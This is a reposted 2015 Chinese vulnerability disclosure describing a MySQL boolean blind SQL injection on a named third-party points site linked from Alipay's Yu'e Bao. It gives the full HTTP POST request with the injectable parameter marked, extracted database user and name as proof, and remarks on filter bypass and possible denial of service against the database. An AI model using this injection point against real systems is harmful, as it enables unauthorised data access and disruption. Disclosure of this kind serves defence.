IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    余额宝某平台网站宝粉网存在MySQL盲注

    神刀发表于 2015-07-22 05:08:15
    love 0

    支付宝客户端上看到余额宝有积分计划,点击后进入了“宝粉网”。http://www.baofen.cn/index.php

    外包站点存在MySQL注射,注射点:

    code 区域
    POST /index.php?act=getLogs&app=treasure&mod=Flashexchange HTTP/1.1
     Content-Length: 49
     Content-Type: application/x-www-form-urlencoded
     X-Requested-With: XMLHttpRequest
     Referer: http://www.baofen.cn
     Cookie: PHPSESSID=t63kglhfa5tlec4v5em1pme7p1; referer=public%2FIndex%2Findex
     Host: www.baofen.cn
     Connection: Keep-alive
     Accept-Encoding: gzip,deflate
     User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html; LeeScan/20150403) 
     Accept: */*
     
     fe_id=643*&p=2



    参数fe_id可注入。MySQL bool blind.

    漏洞证明:

    code 区域
    current user:    'fxkj@%'
     current database:    'tests'



    初步测试,发现后端有简单地过滤了select from,猜解较麻烦,通常需要暴力枚举表格和column,测试没有报错。要能报错倒是省事了

    这个注射点可以用来拒绝服务攻击DB Server

    您可能也喜欢:

    评估显示93%政府网站的网站存在安全漏洞
    超过78%的PHP网站存在漏洞 Perl最安全
    中望MYSQL注射
    世纪佳缘mysql注入
    Multiple Insert update using PHP MySql-Delete multiple records using checkboxes in PHP
    无觅


沪ICP备19023445号-2号
友情链接